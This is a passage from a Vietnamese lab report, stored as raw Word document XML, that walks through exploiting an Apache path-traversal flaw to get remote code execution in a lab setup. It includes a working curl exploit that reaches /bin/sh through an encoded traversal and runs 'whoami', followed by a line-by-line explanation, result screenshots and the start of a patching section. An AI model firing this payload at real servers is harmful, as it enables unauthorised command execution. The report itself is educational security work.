    <w:p w14:paraId="54098947" w14:textId="77777777" w:rsidR="00FE7AFA" w:rsidRPr="00A47A04" w:rsidRDefault="004016DD" w:rsidP="00A47A04">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47A04">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LoadModule cgid_module modules/mod_cgid.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A676356" w14:textId="77777777" w:rsidR="00FE7AFA" w:rsidRDefault="004016DD" w:rsidP="00A47A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792" w:firstLine="648"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004016DD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/IfModule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D543DA" w14:textId="77777777" w:rsidR="0070599E" w:rsidRDefault="004016DD" w:rsidP="00A47A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792" w:firstLine="648"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004016DD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;IfModule !mpm_prefork_module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC42BCD" w14:textId="77777777" w:rsidR="0070599E" w:rsidRDefault="004016DD" w:rsidP="00A47A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1512" w:firstLine="648"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004016DD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LoadModule cgi_module modules/mod_cgi.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C2842" w14:textId="48562E0A" w:rsidR="00E47F12" w:rsidRPr="001446DE" w:rsidRDefault="004016DD" w:rsidP="00A47A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792" w:firstLine="648"/>
      </w:pPr>
      <w:r w:rsidRPr="004016DD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;/IfModule&gt;</w:t>
      </w:r>
      <w:r w:rsidR="001446DE">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A32061E" w14:textId="490C6FCC" w:rsidR="00E47F12" w:rsidRDefault="0070599E" w:rsidP="00931B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả</w:t>
      </w:r>
      <w:r w:rsidR="005A6847">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2077E5" w14:textId="51114159" w:rsidR="005A6847" w:rsidRDefault="00940756" w:rsidP="00931B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00940756">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E04C814" wp14:editId="387C6B73">
            <wp:extent cx="5197290" cy="1920406"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="116518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1590" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5197290" cy="1920406"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93952E" w14:textId="77899429" w:rsidR="00931B8F" w:rsidRDefault="00931B8F" w:rsidP="00931B8F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc171085248"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Kết quả </w:t>
      </w:r>
      <w:r w:rsidR="009D79A1">
        <w:t>của enable mod_cgi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="3B06C89C" w14:textId="77777777" w:rsidR="00032E6B" w:rsidRDefault="00940756" w:rsidP="00032E6B">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00514177">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trên Ubuntu thực hiện reset lại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FFA64" w14:textId="598AC079" w:rsidR="005A6847" w:rsidRDefault="00940756" w:rsidP="00032E6B">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004452E3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/usr/local/apache2/bin/apachectl restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F5FB4" w14:textId="25E42C66" w:rsidR="00052478" w:rsidRDefault="00052478" w:rsidP="00514177">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00514177">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trên Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26D0EC" w14:textId="77777777" w:rsidR="00514177" w:rsidRDefault="004B5B0E" w:rsidP="00514177">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF3588" w14:textId="7D144EFA" w:rsidR="004B5B0E" w:rsidRPr="00AF46D8" w:rsidRDefault="00EE6912" w:rsidP="00514177">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE6912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r w:rsidR="004B50A5" w:rsidRPr="00EE6912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://10.0.2.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -v --data 'echo;whoami' -X POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D80FA2" w14:textId="031E660A" w:rsidR="00AF46D8" w:rsidRDefault="00E656A4" w:rsidP="00367E51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Phân tích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5039F" w14:textId="0D3D4DB3" w:rsidR="00E656A4" w:rsidRDefault="00C41EE3" w:rsidP="004F404C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004F404C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="006A7444">
        <w:t>”: là công cụ dòng lệnh được sử dụng để gửi yêu cầu HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C977811" w14:textId="77777777" w:rsidR="006A7444" w:rsidRDefault="006A7444" w:rsidP="004F404C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="004F404C">
          <w:rPr>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”: đây là giao thức của URL cho biết phương thức giao tiếp giữa client và web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E6000A" w14:textId="77777777" w:rsidR="006A7444" w:rsidRDefault="006A7444" w:rsidP="004F404C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004F404C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t>”: là địa chỉ IP của máy chủ web mà yêu cầu được gửi tới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279C4DA3" w14:textId="77777777" w:rsidR="006A7444" w:rsidRDefault="006A7444" w:rsidP="004F404C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00257391">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004F404C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/cgi-bin/</w:t>
      </w:r>
      <w:r>
        <w:t>”: đường dẫn tới thư mục chứa các script CGI trên máy chủ web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E32625D" w14:textId="680269CD" w:rsidR="006A7444" w:rsidRDefault="006A7444" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00257391">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00257391">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.%2e/.%2e/.%2e/.%2e/</w:t>
      </w:r>
      <w:r>
        <w:t>”: được sử dụng để thử tấn công lỗ hổng Path Traversal. Chuỗi này cố gắng truy cập vào các thư mục mẹ nhiều lần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0F3CE" w14:textId="210F9085" w:rsidR="006A7444" w:rsidRDefault="00E941E7" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“/bin/sh”: là đường dẫn tới chương trình shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00257391">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trên máy chủ. Chương trình shell được sử dụng để thực thi các lệnh từ dòng lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C089C" w14:textId="612EF82D" w:rsidR="00E941E7" w:rsidRDefault="00D00A8E" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00257391">
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00257391">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:t>”: hiển thị các thông tin chi tiết về quá trình gửi yêu cầu và nhận phản hồi</w:t>
      </w:r>
      <w:r w:rsidR="00196952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6604CCBA" w14:textId="62D95841" w:rsidR="00196952" w:rsidRPr="00196952" w:rsidRDefault="00196952" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00257391">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00257391">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-X POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00196952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F2EED">
        <w:t>chỉ định rằng yêu cầu HTTP là một phương thức POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF2BDF" w14:textId="7422A577" w:rsidR="00196952" w:rsidRDefault="00D00A8E" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r w:rsidRPr="00257391">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>--data 'echo;whoami'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F936A2">
        <w:t xml:space="preserve">là dữ liệu gửi đi với yêu cầu POST. Trong trường hợp này, nó bao gồm các lệnh mà kẻ tấn công muốn thực thi trên máy chủ. Lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00F936A2" w:rsidRPr="00F936A2">
        <w:t>echo; whoami</w:t>
      </w:r>
      <w:r w:rsidR="00F936A2">
        <w:t xml:space="preserve"> sẽ xuất ra dòng trống và tên người dùng hiện tại đang thực thi lệnh trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ED94B6" w14:textId="1178914F" w:rsidR="001F2EED" w:rsidRDefault="001F2EED" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nếu máy chủ web có </w:t>
      </w:r>
      <w:r w:rsidRPr="001F2EED">
        <w:t>mod_cgi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> được bật và chấp nhận yêu cầu CGI từ đường dẫn </w:t>
      </w:r>
      <w:r w:rsidRPr="00257391">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t>, và nếu có lỗ hổng Path Traversal, câu lệnh này có thể dẫn đến RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73284E09" w14:textId="4DFE0FD6" w:rsidR="001F2EED" w:rsidRDefault="00B4501C" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1985"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khi nhận được yêu cầu này, máy chủ web có thể sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="0028214B">
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để thực thi các lệnh được cung cấp (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4501C">
        <w:t>echo; whoami</w:t>
      </w:r>
      <w:r>
        <w:t>). Điều này có thể cho phép kẻ tấn công biết được thông tin nhạy cảm như người dùng hiện tại</w:t>
      </w:r>
      <w:r w:rsidR="0028214B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D85F3" w14:textId="57F8B80E" w:rsidR="00E656A4" w:rsidRDefault="00A762E0" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D8B5F" w14:textId="43F37DAA" w:rsidR="00A762E0" w:rsidRDefault="00E43699" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E43699">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F28ABBC" wp14:editId="0651485B">
            <wp:extent cx="5883150" cy="2568163"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="153673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32120" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5883150" cy="2568163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E18781" w14:textId="1370F58B" w:rsidR="00257391" w:rsidRDefault="00257391" w:rsidP="00257391">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc171085249"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0064438B">
        <w:t>Kết quả tấn công RCE bằng Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="20DBC115" w14:textId="2AB91C0B" w:rsidR="00A762E0" w:rsidRDefault="00FC60E9" w:rsidP="00A10E45">
      <w:pPr>
        <w:ind w:firstLine="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00A10E45">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4</w:t>
      </w:r>
      <w:r w:rsidR="00525F88" w:rsidRPr="00A10E45">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kiểm tra kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015B1FF" w14:textId="33B8EB29" w:rsidR="00AE57D2" w:rsidRDefault="008A139F" w:rsidP="00A10E45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="007C0943" w:rsidRPr="007C0943">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /usr/local/apache2/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DF243" w14:textId="58FAECC5" w:rsidR="007C0943" w:rsidRDefault="007C0943" w:rsidP="00A10E45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A304D" w14:textId="3BDCA933" w:rsidR="007C0943" w:rsidRDefault="007C0943" w:rsidP="00A10E45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007C0943">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B53D8F4" wp14:editId="7AB6D0CB">
            <wp:extent cx="5372566" cy="1089754"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174584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9688" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5372566" cy="1089754"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDFD88" w14:textId="7DEB44DB" w:rsidR="00A10E45" w:rsidRPr="008816E7" w:rsidRDefault="00A10E45" w:rsidP="00A10E45">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc171085250"/>
      <w:r>
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Kết quả </w:t>
      </w:r>
      <w:r w:rsidR="00022A7A">
        <w:t>kiểm tra lại tên User trên Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="433C2E15" w14:textId="5E83EB71" w:rsidR="00172A6C" w:rsidRPr="00BD67BD" w:rsidRDefault="004D03D3" w:rsidP="005F22A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0D8"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD67BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kết luận: Thực hiện khai thác RCE thành công</w:t>
      </w:r>
      <w:r w:rsidR="003C23D8" w:rsidRPr="00BD67BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE6DF9" w14:textId="7890424C" w:rsidR="00C45C8F" w:rsidRDefault="00416976" w:rsidP="00BD67BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc171085532"/>
      <w:r>
        <w:t>Cách vá các lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="5DC1541D" w14:textId="0E50ABAA" w:rsidR="005267E0" w:rsidRDefault="00BD20BD" w:rsidP="00BD67BD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đến này 7/10 </w:t>
      </w:r>
      <w:r w:rsidR="00465E49">
        <w:t xml:space="preserve">bản vá hoàn thiện các lỗ hổng này được Apache công bố </w:t>
      </w:r>
      <w:r w:rsidR="0059306F">
        <w:t xml:space="preserve">trong đó thêm function </w:t>
      </w:r>
      <w:r w:rsidR="0059306F" w:rsidRPr="0059306F">
        <w:t>ap_unescape_url_ex()</w:t>
      </w:r>
      <w:r w:rsidR="0059306F">
        <w:t xml:space="preserve"> để kiểm soát việc chuẩn hóa và giải mã URL</w:t>
      </w:r>
      <w:r w:rsidR="00F952C4">
        <w:t xml:space="preserve">, cùng với việc ngừng sử dụng cờ </w:t>
      </w:r>
      <w:r w:rsidR="00F952C4" w:rsidRPr="00F952C4">
        <w:t>AP_NORMALIZE_DROP_PARAMETERS</w:t>
      </w:r>
      <w:r w:rsidR="00F952C4">
        <w:t>, là một bước quan trọng trong việc bảo vệ máy chủ khỏi các lỗ hổng bảo mật. Dưới đây</w:t>
      </w:r>
      <w:r w:rsidR="00E66AF9">
        <w:t xml:space="preserve"> là chi tiết về cách mà những thay đổi này giúp cải thiện bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05149601" w14:textId="11C869BF" w:rsidR="00E66AF9" w:rsidRDefault="00E66AF9" w:rsidP="00BD67BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r w:rsidRPr="0059306F">
        <w:t>ap_unescape_url_ex()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FA0890">
        <w:t xml:space="preserve">được thiết kế để kiểm soát và chuẩn hóa URI một cách chặt chẽ hơn. Nó xử lý việc giải mã các ký tự đặc biệt và đảm bảo rằng các đường dẫn URL được chuẩn hóa một cách an toàn. </w:t>
      </w:r>
      <w:r w:rsidR="00E905A8">
